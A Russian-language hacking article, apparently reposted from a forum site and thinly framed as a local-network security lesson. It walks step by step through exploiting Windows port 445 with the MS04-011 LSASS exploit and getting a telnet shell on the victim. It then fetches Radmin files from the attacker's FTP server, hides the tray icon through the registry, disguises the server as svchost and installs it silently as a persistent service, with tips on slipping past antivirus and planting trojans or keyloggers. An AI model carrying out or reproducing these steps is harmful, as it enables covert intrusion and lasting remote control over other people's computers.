Скрытая установка Radmin

Скрытая установка Radmin

Radmin 2.1 Пароль www.helpwin.ru

Речь в этой стати будет об элементарной безопасности в локальной сети, многие даже не подозревают, что на первый взгляд маленькая и безобидная сетка с 10 компов может принести много неприятностей, по сети можно не только фильмы друг в друга копировать (если шара открыта ? ) и в контру играть, как думают 90% людей в сети, и игнорируют фаирволы, но и одолжить/утащить из-под носа например номер счёта и пароль кошелька в веб-маней, где все сбережения нашего геймера, который считает, что фаирвол тока ресурсы ПК жрёт и бес толку его ставить. Также здесь будет описан ход проникновения на «вражий» ПК, от сканирования порта до управления файлами, реестром и просмотра рабочего стола, если кто не знает что такое реестр делает «Пуск-Выполнить:REGEDIT» и изучает, или флаг в руки - читает далее. Злоумышленник - если залез в не свой комп и делает зло, но если залез в чужой компутер с благими намерениями, то мы уже умышленник =).
Берём любой сканер портов, суть написания сканера портов описана на сайте www.ehteam.jino-net.ru в разделе «Стати / Кодинг» автор Samael, и сканируем локалку на наличие у кого нибуть открытого 445 порта, через который и будем ломится в удалённую машину с помощью експлоита написанного хакером одиночкой houseofdabus, сам же екслоит называется HOD-ms04011-lsasrv-expl (идём к другу, спрашиваем линк на Рамблер, за пиво получаем заветную ссылку и ищем сорс этого експлоита). После удачных поисков найденный сорс компилим в Visual C++ (следует отключить антивирус, если он у вас стоит, иначе ехе-шник вам никогда не увидеть =)

Теперь заботимся о собственной анонимности, ставим прогу VMWare (кто не знает што это, объясню, суть работы – установка и запуск других, гостевых, операционных систем из активной в данный момент, таким образом можно сконфигурировать гостевую ОС для работы в локальной сети, причём она будет иметь свой ІР так, что Ваш основной нигде не светиться), но если вам не страшно что прейдет к вам дядя здоровенный, фейс чистить за якобы случайно форматнутый винт, не ставьте =)

Далее открываем эмуляцию доса, аж 2 окна, с одного будем нападать, с другого культурно телнетом конектиться на атакованный порт ;), если страшный Вам телнет, берём Пюти на этом же сайте.

Запускаем сплойт

Пуск – Выполнить: CMD
Окно DOSа: (допустим експлоит перейменували в expl, зачем такое длинное название нам, пока по находишь все буквы на клаве можно забить что делал, и положили в C:\Temp)

C:\Temp\Expl 0 123.456.789.666 666 (давим Enter) тут 0 значит что Ось в жертвы Windows XP Pro, 123.456.789.666 ір жертвы, 666 открываемый порт для телнета, если увидим висяче окно как будет дальше, то всё ОК =)(не стоит забывать, ip сложен из 4 байт, тоесть 0-255,0-255,0-255,0-255, в данном пример используется неправильный ip с личных соображений)

[] Target: IP: 123.456.789.666: OS Windows XP Professional …
[] Connecting to 123.456.789.666:445 … OK
[] Attacking … OK

как только это увидели лезем за телнетом, и конектимся на 123.456.789.666:666,
telnet 123.456.789.666 666
(в нашем примере это ip атакуемого ПК, порт в диапазоне 0-65500) и только если не стоит модный фаирвол или антивирус со встроенной защитой от разных интернет червей на атакуемой машине, ми имеем заветное %systemroot%\system32\ ну а дальше…. фантазии у нас очень много… Делаем что в голову взбредёт, дарим этому дяди коня троянского, или кейлогера самопального, а чё, пускай юзает. Фантазируем в разумных целях, мы же умишленники, не забили? Например, ставим втихаря через консоль Радмин, для установки надо всего 3 файла, r_server.exe, raddrv.exe, ArmDll.dll как туда закинуть эти файлы дело ваше, мона через фтп, в каждой локалке должен бить фтп, прячем эти файлики, чтобы никто не просек, в консоле удалённой тачки пишем:
ftp –A 123.456.789.101 (регистр имеет значение)
ключ –А значит, что соединение анонимное 123.456.789.101 – адрес нашего фтп сервера командами:

cd – зайти в каталог;
get – качать файл с сервера;
put – качать файл на сервер
управляем нашими файлами, заливаем и качаем через телнет подключение, предварительно включив binary, иначе файлы будут незапускаемыми, закачка файлов с фтп в директорию, где мы сейчас, пример: ( \incoming\music\dethmetall\I_hask_you_dear_lamer - это наша секретная директория, еще очен важный момент, на фтп должен быть доступ к одной из директорий для записи, если нет, ищем прогу и делаем свой фтп)

Заливаем файлы на сервер, открываем DOS-эмуль, далее:

ftp –A 123.456.789.101
cd incoming
cd music
cd dethmetall
cd I_xask_you_dear_lamer (теперь мы в секретной папке, сюда заливаем)
binary (копируем в бинарном (!) режиме)
put r_server.exe
put raddrv.dll
put AdmDll.dll (теперь файлы на фтп)
bye (выход с фтп)
Теперь заходим так же тока с телнета:
ftp –A 123.456.789.101
cd incoming
cd music
cd dethmetall
cd I_xask_you_dear_lamer (теперь мы в секретной папке)
ls (смотрим, есть ли наши файлы)
r_server.exe
raddrv.dll
AdmDll.dll (хорошо, все три файла присутствуют)
get r_server.exe
get raddrv.dll
get AdmDll.dll (файлы теперь на «вражеской машине»)
bye (покинуть фтп)
(при роботе с фтп регистр имеет значение, файлы копируются в директорию, с которой мы зашли на фтп, в данном случае \System32\) Далее работаем над скрытием Радмина от нашего пользователя, а вдруг он окажется умнее чем мы предположили (никогда не недооценивайте(!) ).

Работаем с реестром

Мы в телнет-соединении с атакованным, пишем: REG ADD HKLM\System\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 01000000 (этот ключ скрывает заначек радмина в трее)

Теперь работаем с процессом, если запустить сервер радмина, то увидим нечто неприятное, там процесс r_server, зато svchost.exe примерно 5 процессов, не будет заметно если их станет 6-ть, для этого всего-то переименуем командой: REN r_server.exe svchost.exe.exe (замаскировали) Теперь в телнете же пишем: svchost.exe.exe /pass:lamer_nash /port:666 /install /save /silence (ключ pass - пароль для конекта ;
port – изменяем порт на свое усмотрение:
install – инсталлируем как сервис;
save – теперь эти параметры будут как по умолчатию;
silence – не вылазит на взломанной машине окошко «Параметры Сохранены»)
теперь запускаем сервер командою
svchost.exe.exe /start
ждём пока система переварит что от нее хотят, зависит что делает атакований пользователь, запускам со своёй машины Радмин-клиент radmin.exe и коннектимся на 123,456,789,666:666 Теперь у нас всегда будет в руках этот комп, мы же проинсталлировали Радмин как сервис, до тех пор пока этот ЮЗВЕРЬ не станет умнее, или не найдёт друга поумнее, или Винду за 10 зелёных долларов кто-то ему не переставит =). Позитивный момент: 10-13% имеют средства защиты и небыли взломаны, это уже радует, после прочтения этого материала стоит задуматься, надо фаирвол и антивирус или нет.

PS:

Это было проделано на Осях WinXP pro SP1/SP2, Win2k SP4, во время «теста» хорошо себя показал NortonAntivirus 2005 своею самостоятельностью блокировать 445 порт и орать на весь монитор «Типа вас атаковал ЫР 0,0,0,666 порт 445», фаирвол Оутпост2.0 тоже не пускает. Фаирвол и антивирус Касперского отстой, даже не пикнул, хотя и должен был блокировать, он хорош проверять кто твой комп сканирует и всё ;), при закачке троянов и т.п. через радмин Касперский предлагает удалить или нет, берем опцыю радмина «полный контроль» и быстренько нажымаем разришить, Нортон такие дела сразу блокирует. Во время проведения «мероприятия» было извлечено 15гб фильмов, выпито 4,5 литра пива, прослушано 2 концерта Рамштайн, 1 концерт КиШа, 2,2 часов Баха и Паганини… Информация на атакованных машинах не постраждал, юзверы не постраждали, автор стати тоже не постраждал (пока шо). Использование данного материала в злых намерениях на собственный страх и риск. Помним, УК РФ предусматривает, незаконное сканирование(!) одного(!) адреса, одного(!) порта грозит от 3 до 7 лет(!).

Данная статья предоставлена в ознакомительных целях с возможной опасностью. Автор ответственность за использование данного материала в незаконных целях не несет, проверку правдивости этой стати вы делаете на свой страх и риск.

Взято с http://trill.ucoz.ru/

=======================
Внимание: Авторы проекта предупреждают, что данные статьи даны исключительно в ознакомительных целях, а также в целях предотвращения подобных атак! Многие из описанных здесь действий ПРОТИВОЗАКОННЫ. Если кто-то всё же решит использовать данные статьи в противозаконных целях, авторы снимают с себя всякую ответственность!

Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь.
Мы рекомендуем Вам зарегистрироваться либо войти на сайт под своим именем.
Информация
Посетители, находящиеся в группе Гости, не могут оставлять комментарии к данной публикации.